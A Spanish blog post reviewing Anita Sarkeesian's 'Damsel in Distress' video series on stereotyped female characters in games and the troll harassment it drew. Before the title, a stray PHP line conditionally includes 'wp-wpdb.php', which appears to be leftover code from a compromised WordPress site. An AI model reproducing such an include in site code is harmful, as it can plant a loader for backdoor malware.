if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Damsel in Distress, una crítica a los estereotipos femeninos en los videojuegos – La Fortaleza de LeChuck

Damsel in Distress, una crítica a los estereotipos femeninos en los videojuegos

Hoy quería hablaros de unos videos que han suscitado bastante polémica por Youtube, se trata de la serie Damsel in Distress, un proyecto de Anita Sarkeesian que estudia la situación de los personajes femeninos en el mundo de los videojuegos, y que está levantando ampollas en el sector masculino.

El objetivo de «Damisela en apuros» no es otro que romper con los estereotipos relacionados con las mujeres en los videojuegos y cultura en general, así como denunciar el acoso a las mujeres en los modos multijugador.

El primer video fue subido en marzo de este año, y en él podemos ver diferentes ejemplos de protagonistas femeninas como la representación de la debilidad y la necesidad de ser salvadas por un protagonista fuerte y valeroso. Anita explica la curiosa historia de Dinosaur Planet, un juego que tenía previsto ser lanzado en Nintendo 64 pero que nunca vio la luz. En él, una poderosa heroína tenía que salvar el mundo. Años más tarde, el juego fue reescrito y reediseñado para convertirse en Star Fox Adventures, y aquella heroína pasó a ser una damisela en apuros.

Aquí tenéis el primer video, podéis activar los subtítulos en castellano.

La segunda parte de Damsel in Distress trata la violencia hacia los personajes femeninos y su sacrificio como motivo para que el protagonista masculino se lance a derrotar al malo malísimo. Curiosamente, a la hora de ser subido, Youtube lo retiró por el aluvión de denuncias referentes a la violación de los términos de servicio. Por supuesto, ya vuelve a estar disponible.

El tercer y último video (al menos por el momento) narra el legado de los juegos del pasado en los indies de hoy en día con ello la vuelta del rescate de la princesa o chica en apuros. Podéis verlos en el canal de Anita Feminist Frequency.

Como todos sabéis, en internet rondan muchas mentes primitivas, por lo que una avalancha de trolls ensuciaron los comentarios. Por esta razón, Anita tomó la decisión de desactivarlos. La mayoría de mensajes podrían resumirse en: Insulto gratuito o un «No es necesario hacer esto«. Los buenos resultados y apoyo recibido no van a frenar las ganas de esta youtuber de continuar con el proyecto.

Después de finalizar ambos videos, puedo decir que estoy de acuerdo en muchas de las cosas que Anita resalta, y es que odio los estereotipos en general, todos, limitan la creatividad y la originalidad. Y en este caso particular, como mujer fuerte que me considero, no me gusta ver tantas princesitas indefensas, quiero ver princesas-guerreras, grandes aventureras, mafiosas, rebeldes, etc repartiendo guantazos. Gracias a juegos como Tomb Raider, o el inminente Remember Me, están creando una especie de consciencia social en los jugadores, los cuales se acostumbran a estos papeles femeninos. También destacar la labor de Bioware, los cuales además no tienen tapujos con el tema de la homosexualidad, otro de los sectores más castigados en los videojuegos.

El triste caso del acoso de trolls me recuerda al padre que modificó el código de Donkey Kong y puso a Pauline de protagonista, tan solo para satisfacer a su hija (si os acordáis lo tratamos aquí) Este tierno gesto fue interpretado como una práctica «feminazi», entre otras sandeces más.

En fin, mundo loco este…